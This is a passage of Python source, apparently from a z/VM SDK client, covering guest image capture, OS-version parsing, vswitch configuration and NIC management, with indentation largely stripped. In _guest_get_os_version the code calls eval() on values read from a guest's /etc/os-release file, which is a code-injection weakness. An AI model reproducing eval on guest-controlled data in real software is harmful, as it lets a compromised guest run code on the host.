return os_version
def guest_capture(self, userid, image_name, capture_type='rootonly',
compress_level=6, capture_device_assign=None):
if capture_type == "alldisks":
func = ('Capture guest with type: %s' % capture_type)
msg = ('%s is not supported in current release' % func)
LOG.error(msg)
raise exception.SDKFunctionNotImplementError(func=func,
modID='guest')
msg = ('Start to capture %(vm)s to generate image %(img)s with '
'capture type %(type)s' % {'vm': userid,
'img': image_name,
'type': capture_type})
LOG.info(msg)
# self._check_power_state(userid, 'capture')
restart_flag = False
reachable = self.get_guest_connection_status(userid)
if reachable:
# Make sure iucv channel is ready for communication on source vm
try:
self.execute_cmd(userid, 'pwd')
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to check iucv status on capture source vm '
'%(vm)s with error %(err)s'
% {'vm': userid, 'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# Get the os version of the vm
try:
os_version = self._guest_get_os_version(userid)
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to execute command on capture source vm %(vm)s'
'to get os version with error %(err)s'
% {'vm': userid, 'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except Exception as err:
msg = ('Error happened when parsing os version on source vm '
'%(vm)s with error: %(err)s'
% {'vm': userid, 'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
msg = ('The capture source vm os version %(vm)s is %(version)s'
% {'vm': userid, 'version': os_version})
LOG.info(msg)
# Find the root device according to the capture type
try:
capture_devices = self._get_capture_devices(userid,
capture_type)
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to execute command on source vm %(vm)s to get '
'devices for capture with error %(err)s'
% {'vm': userid, 'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except Exception as err:
msg = ('Internal error happened when getting the devices for '
'capture on source vm %(vm)s with error %(err)s' %
{'vm': userid, 'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except exception.SDKGuestOperationError:
raise
# Shutdown the vm before capture
self.guest_softstop(userid)
            # Keep the restart flag to be used after capture.
restart_flag = True
else:
os_version = self.get_os_version_from_userid(userid)
            # capture_device_assign specifies the disk to capture.
            # The input should be a string identifying the disk.
            # The force_capture_disk value from zvmsdk.conf takes
            # precedence if force_capture_disk=xxxx is set.
if CONF.zvm.force_capture_disk:
capture_devices = [str(CONF.zvm.force_capture_disk)]
else:
if capture_device_assign:
capture_devices = [str(capture_device_assign)]
else:
direct_info = self.get_user_direct(userid)
disk_info =\
[x for x in direct_info if x.startswith('MDISK')]
capture_devices = \
[x.split(' ')[1].strip(' ') for x in disk_info]
if not capture_devices:
msg = ('Error happened when getting the devices for '
'get vm disk information on source vm %(vm)s '
% {'vm': userid})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
            # If the VM is powered on, it needs to be stopped and restarted
power_state = self.get_power_state(userid)
if power_state == 'on':
# Shutdown the vm before capture
self.guest_stop(userid)
restart_flag = True
# Prepare directory for writing image file
image_temp_dir = '/'.join((CONF.image.sdk_image_repository,
const.IMAGE_TYPE['CAPTURE'],
os_version,
image_name))
self._pathutils.mkdir_if_not_exist(image_temp_dir)
# Call creatediskimage to capture a vm to generate an image
# TODO:(nafei) to support multiple disk capture
vdev = capture_devices[0]
msg = ('Found the device %(vdev)s of %(vm)s for capture' %
{'vdev': vdev, 'vm': userid})
LOG.info(msg)
image_file_name = vdev
image_file_path = '/'.join((image_temp_dir, image_file_name))
cmd = ['sudo', '/opt/zthin/bin/creatediskimage', userid, vdev,
image_file_path, '--compression', str(compress_level)]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("creatediskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
self._pathutils.clean_temp_folder(image_temp_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=err_output)
# Move the generated image to netboot folder
image_final_dir = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
os_version,
image_name])
image_final_path = '/'.join((image_final_dir,
image_file_name))
self._pathutils.mkdir_if_not_exist(image_final_dir)
cmd = ['mv', image_file_path, image_final_path]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("move image file from staging to netboot "
"folder failed with return code: %d." % rc)
LOG.error(err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
self._pathutils.clean_temp_folder(image_final_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
err=err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
msg = ('Updating the metadata for captured image %s ' % image_name)
LOG.info(msg)
# Get md5sum of image
real_md5sum = self._get_md5sum(image_final_path)
# Get disk_size_units of image
disk_size_units = self._get_disk_size_units(image_final_path)
# Get the image physical size
image_size = self._get_image_size(image_final_path)
# Create the image record in image database
self._ImageDbOperator.image_add_record(image_name, os_version,
real_md5sum, disk_size_units, image_size,
capture_type)
if restart_flag:
            LOG.info('Try to start %s since capture completed successfully.'
                     % userid)
self.guest_start(userid)
LOG.info('Image %s is captured and imported to image repository '
'successfully' % image_name)
def _guest_get_os_version(self, userid):
os_version = ''
release_file = self.execute_cmd(userid, 'ls /etc/*-release')
if '/etc/os-release' in release_file:
# Parse os-release file, part of the output looks like:
# NAME="Red Hat Enterprise Linux Server"
# ID="rhel"
# VERSION_ID="7.0"
release_info = self.execute_cmd(userid, 'cat /etc/os-release')
release_dict = {}
            for item in release_info:
                if item:
                    # Split on the first '=' only; values may contain '='
                    key, value = item.split('=', 1)
                    release_dict[key] = value
distro = release_dict['ID']
version = release_dict['VERSION_ID']
if '"' in distro:
distro = eval(distro)
if '"' in version:
version = eval(version)
os_version = '%s%s' % (distro, version)
return os_version
elif '/etc/redhat-release' in release_file:
# The output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/redhat-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
elif '/etc/SuSE-release' in release_file:
# The output for this file looks like:
# SUSE Linux Enterprise Server 11 (s390x)
# VERSION = 11
# PATCHLEVEL = 3
distro = 'sles'
release_info = self.execute_cmd(userid, 'cat /etc/SuSE-release')
LOG.debug('OS release info is %s' % release_info)
release_version = '.'.join((release_info[1].split('=')[1].strip(),
release_info[2].split('=')[1].strip()))
os_version = ''.join((distro, release_version))
return os_version
elif '/etc/system-release' in release_file:
# For some rhel6.7 system, it only have system-release file and
# the output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/system-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
def _get_capture_devices(self, userid, capture_type='rootonly'):
capture_devices = []
if capture_type == 'rootonly':
# Parse the /proc/cmdline to get root devices
proc_cmdline = self.execute_cmd(userid, 'cat /proc/cmdline '
'| tr " " "\\n" | grep -a "^root=" | cut -c6-')
root_device_info = proc_cmdline[0]
if not root_device_info:
msg = ('Unable to get useful info from /proc/cmdline to '
'locate the device associated with the root directory '
'on capture source vm %s' % userid)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
if 'UUID=' in root_device_info:
uuid = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-uuid', uuid))
elif 'LABEL=' in root_device_info:
label = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-label', label))
elif 'mapper' in root_device_info:
msg = ('Capturing a disk with root filesystem on logical'
' volume is not supported')
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
root_device = root_device_info
root_device_node = self.execute_cmd(userid, 'readlink -f %s' %
root_device)[0]
# Get device node vdev by node name
cmd = ('cat /proc/dasd/devices | grep -i "is %s" ' %
root_device_node.split('/')[-1].rstrip(string.digits))
result = self.execute_cmd(userid, cmd)[0]
root_device_vdev = result.split()[0][4:8]
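                # e.g. (hypothetical) a line starting "0.0.0100(ECKD) ..."
                # yields root_device_vdev '0100'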
capture_devices.append(root_device_vdev)
return capture_devices
else:
# For sysclone, parse the user directory entry to get the devices
# for capture, leave for future
pass
def _get_unpackdiskimage_cmd_rhcos(self, userid, image_name,
transportfiles=None, vdev=None,
image_file=None, hostname=None,
skipdiskcopy=False):
if skipdiskcopy:
os_version = image_name
image_disk_type = 'SCSI'
else:
os_version = self.image_get_os_distro(image_name)
# Query image disk type
image_disk_type = self._get_image_disk_type(image_name)
if image_disk_type is None:
err_msg = ("failed to get image disk type for "
"image '%(image_name)s'."
% {'image_name': image_name})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
try:
# Query vm's disk pool type and image disk type
from zvmsdk import dist
_dist_manager = dist.LinuxDistManager()
linuxdist = _dist_manager.get_linux_dist(os_version)()
# Read coros fixed ip parameter from tempfile
fixed_ip_parameter = linuxdist.read_coreos_parameter(userid)
except Exception as err:
err_msg = ("failed to read coreos fixed ip "
"parameters for userid '%(userid)s',"
"error: %(err)s."
% {'userid': userid, 'err': err})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if fixed_ip_parameter is None:
err_msg = ("coreos fixed ip parameters don't exist.")
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if hostname:
# replace hostname to display name instead of userid
fixed_ip_parameter = fixed_ip_parameter.replace(userid.upper(),
hostname)
# read nic device id and change it into the form like
# "0.0.1000,0.0.1001,0.0.1002"
nic_id = self._generate_increasing_nic_id(
fixed_ip_parameter.split(":")[5].replace("enc", ""))
if image_disk_type == 'SCSI':
(wwpn, lun) = self._get_wwpn_lun(userid)
if wwpn is None or lun is None:
err_msg = ("wwpn and lun is required for FCP devices,"
" please set LOADDEV for userid %s" % userid)
raise exception.SDKGuestOperationError(rs=14, userid=userid,
msg=err_msg)
wwpn = '0x' + wwpn
lun = '0x' + lun
if skipdiskcopy:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, transportfiles, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, image_file, transportfiles,
image_disk_type, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file, transportfiles, image_disk_type, nic_id,
fixed_ip_parameter]
def grant_user_to_vswitch(self, vswitch_name, userid):
"""Set vswitch to grant user."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k grant_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to grant user %s to vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def _set_vswitch_exception(self, error, switch_name):
if ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and (error.results['rs'] == 2846)):
errmsg = ("Operation is not allowed for a "
"VLAN UNAWARE vswitch")
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2838) or
(error.results['rs'] == 2853) or
(error.results['rs'] == 2856) or
(error.results['rs'] == 2858) or
(error.results['rs'] == 3022) or
(error.results['rs'] == 3033))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
else:
raise error
def revoke_user_from_vswitch(self, vswitch_name, userid):
"""Revoke user for vswitch."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k revoke_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to revoke user %s from vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def image_performance_query(self, uid_list):
"""Call Image_Performance_Query to get guest current status.
:uid_list: A list of zvm userids to be queried
"""
if uid_list == []:
return {}
if not isinstance(uid_list, list):
uid_list = [uid_list]
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Image_Performance_Query" % smt_userid,
"--operands",
'-T "%s"' % (' '.join(uid_list)),
"-c %d" % len(uid_list)))
action = "get performance info of userid '%s'" % str(uid_list)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
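        # The parsed result below is keyed by guest name; one entry looks
        # like (hypothetical values)
        #   {'VM1': {'userid': 'VM1', 'guest_cpus': '2',
        #            'used_memory': '290232 KB', ...}}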
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
                # When only one userid is queried and that userid is in
                # 'off' state, smcli only returns the queried userid
                # number; no valid performance info is returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
def system_image_performance_query(self, namelist):
"""Call System_Image_Performance_Query to get guest current status.
:namelist: A namelist that defined in smapi namelist file.
"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API System_Image_Performance_Query" % smt_userid,
"--operands -T %s" % namelist))
action = "get performance info of namelist '%s'" % namelist
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
                # When only one userid is queried and that userid is in
                # 'off' state, smcli only returns the queried userid
                # number; no valid performance info is returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
def virtual_network_vswitch_query_byte_stats(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Byte_Stats" %
smt_userid,
"--operands",
'-T "%s"' % smt_userid,
'-k "switch_name=*"'
))
action = "query vswitch usage info"
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return self._parse_vswitch_inspect_data(results['response'])
def get_host_info(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost general")
host_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.RINV_HOST_KEYWORDS)
return host_info
def get_diskpool_info(self, pool):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost diskpoolspace %s" % pool)
dp_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.DISKPOOL_KEYWORDS)
return dp_info
def get_vswitch_list(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query" % smt_userid,
"--operands",
"-s \'*\'"))
try:
result = self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
LOG.warning("No Virtual switch in the host")
return []
else:
LOG.error("Failed to get vswitch list, error: %s" %
err.format_message())
raise
with zvmutils.expect_invalid_resp_data():
if (not result['response'] or not result['response'][0]):
return []
else:
data = '\n'.join([s for s in result['response']
if isinstance(s, six.string_types)])
output = re.findall('VSWITCH: Name: (.*)', data)
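                # e.g. (hypothetical) a response line "VSWITCH: Name: VSW1"
                # contributes 'VSW1' to the returned list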
return output
def set_vswitch_port_vlan_id(self, vswitch_name, userid, vlan_id):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k grant_userid=%s" % userid,
"-k switch_name=%s" % vswitch_name,
"-k user_vlan_id=%s" % vlan_id,
"-k persist=YES"))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set VLAN ID %s on vswitch %s for user %s, "
"error: %s" %
(vlan_id, vswitch_name, userid, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
msg = ('Set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s successfully'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
def add_vswitch(self, name, rdev=None, controller='*',
connection='CONNECT', network_type='ETHERNET',
router="NONROUTER", vid='UNAWARE', port_type='ACCESS',
gvrp='GVRP', queue_mem=8, native_vid=1, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Create_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % name))
if rdev is not None:
rd += " -k real_device_address" +\
"=\'%s\'" % rdev.replace(',', ' ')
if controller != '*':
rd += " -k controller_name=%s" % controller
rd = ' '.join((rd,
"-k connection_value=%s" % connection,
"-k queue_memory_limit=%s" % queue_mem,
"-k transport_type=%s" % network_type,
"-k vlan_id=%s" % vid,
"-k persist=%s" % (persist and 'YES' or 'NO')))
        # Only if the vswitch is VLAN aware are port_type, gvrp and
        # native_vid allowed to be specified
if isinstance(vid, int) or vid.upper() != 'UNAWARE':
rd = ' '.join((rd,
"-k port_type=%s" % port_type,
"-k gvrp_value=%s" % gvrp,
"-k native_vlanid=%s" % native_vid))
if router is not None:
rd += " -k routing_value=%s" % router
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to create vswitch %s, error: %s" %
(name, err.format_message()))
raise
msg = ('Create vswitch %s successfully' % name)
LOG.info(msg)
def set_vswitch(self, switch_name, **kwargs):
"""Set vswitch"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name))
for k, v in kwargs.items():
rd = ' '.join((rd,
"-k %(key)s=\'%(value)s\'" %
{'key': k, 'value': v}))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set vswitch %s, error: %s" %
(switch_name, err.format_message()))
self._set_vswitch_exception(err, switch_name)
def delete_vswitch(self, switch_name, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to delete vswitch %s' % switch_name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Delete_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name,
"-k persist=%s" % (persist and 'YES' or 'NO')))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
if ((results['rc'] == 212) and
(results['rs'] == 40)):
LOG.warning("Vswitch %s does not exist", switch_name)
return
else:
LOG.error("Failed to delete vswitch %s, error: %s" %
(switch_name, err.format_message()))
raise
msg = ('Delete vswitch %s successfully' % switch_name)
LOG.info(msg)
def create_nic(self, userid, vdev=None, nic_id=None,
mac_addr=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'ID is %(id)s, address is %(address)s',
{'vdev': nic_vdev,
'id': nic_id or 'not specified',
'address': mac_addr or 'not specified'})
self._create_nic(userid, nic_vdev, nic_id=nic_id,
mac_addr=mac_addr, active=active)
return nic_vdev
def _create_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _create_nic_active_exception(self, error, userid, vdev):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 28))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
elif ((error.results['rc'] == 396) and
(error.results['rs'] == 2797)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _is_active(self, userid):
# Get the vm status
power_state = self.get_power_state(userid)
if power_state == 'off':
LOG.error('The vm %s is powered off, '
'active operation is not allowed' % userid)
raise exception.SDKConflictError(modID='network', rs=1,
userid=userid)
def _create_nic(self, userid, vdev, nic_id=None, mac_addr=None,
active=False):
if active:
self._is_active(userid)
msg = ('Start to create nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended_DM' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
if mac_addr is not None:
mac = ''.join(mac_addr.split(':'))[6:]
requestData += ' -k mac_id=%s' % mac
retry = 1
for secs in [1, 3, 5, 8, -1]:
try:
self._request(requestData)
break
except exception.SDKSMTRequestFailed as err:
if (err.results['rc'] == 400 and
err.results['rs'] == 12 and
retry < 5):
LOG.info("The VM is locked, will retry")
time.sleep(secs)
retry += 1
else:
LOG.error("Failed to create nic %s for user %s in "
"the guest's user direct, error: %s" %
(vdev, userid, err.format_message()))
self._create_nic_inactive_exception(err, userid, vdev)
if active:
if mac_addr is not None:
LOG.warning("Ignore the mac address %s when "
"adding nic on an active system" % mac_addr)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
msg1 = err1.format_message()
persist_OK = True
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Delete_DM' % userid,
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results = err2.results
msg2 = err2.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._create_nic_active_exception(err1, userid, vdev)
else:
raise exception.SDKNetworkOperationError(rs=4,
nic=vdev, userid=userid,
create_err=msg1, revoke_err=msg2)
self._NetDbOperator.switch_add_record(userid, vdev, port=nic_id)
msg = ('Create nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def get_user_direct(self, userid):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm %s directory" % userid)
return results.get('response', [])
def get_all_user_direct(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm alldirectory")
return results.get('response', [])
def get_diskpool_volumes(self, pool):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("gethost diskpoolvolumes %s" % pool)
diskpool_volumes = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.DISKPOOL_VOLUME_KEYWORDS)
return diskpool_volumes
def get_volume_info(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("gethost volumeinfo")
with zvmutils.expect_invalid_resp_data(results):
volume_info = zvmutils.translate_response_data_to_expect_dict(
results['response'], 3)
return volume_info
def _delete_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=8,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _delete_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=9,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def delete_nic(self, userid, vdev, active=False):
if active:
self._is_active(userid)
vdev_exist = False
nic_list = self._NetDbOperator.switch_select_record_for_userid(userid)
for p in nic_list:
if (int(p['interface'], 16) == int(vdev, 16)):
vdev_exist = True
vdev_info = p
break
if not vdev_exist:
            # The device has already been removed from the user direct
LOG.warning("Virtual device %s does not exist in the switch table",
vdev)
if active:
try:
resp = self.execute_cmd(userid, 'vmcp q %s' % vdev)
nic_info = "%s ON NIC" % vdev.zfill(4).upper()
osa_info = "%s ON OSA" % vdev.zfill(4).upper()
if nic_info in resp[0]:
pass
elif osa_info in resp[0]:
self._undedicate_nic(userid, vdev, active=active,
del_active_only=True)
return
else:
LOG.warning("Device %s of guest %s is not "
"network adapter" % (vdev, userid))
return
except exception.SDKSMTRequestFailed as err:
emsg = err.format_message()
ignored_msg = ('Device %s does not exist'
% vdev.zfill(4).upper())
if (emsg.__contains__(ignored_msg)):
LOG.warning("Virtual device %s does not exist for "
"active guest %s" % (vdev, userid))
return
else:
raise
else:
return
else:
            # The device has not been removed from the user direct;
            # check whether it is related to a dedicated OSA device
if ((vdev_info["comments"] is not None) and
(vdev_info["comments"].__contains__('OSA='))):
self._undedicate_nic(userid, vdev, active=active)
return
msg = ('Start to delete nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if vdev_exist:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete_DM" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to delete nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._delete_nic_inactive_exception(err, userid, vdev)
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to delete nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._delete_nic_active_exception(err, userid, vdev)
msg = ('Delete nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _couple_active_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 212) and
((error.results['rs'] == 28) or
(error.results['rs'] == 8))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
elif ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % vswitch
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2788) or
(error.results['rs'] == 2848) or
(error.results['rs'] == 3034) or
(error.results['rs'] == 6011))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
else:
raise error
def _couple_inactive_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 412) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
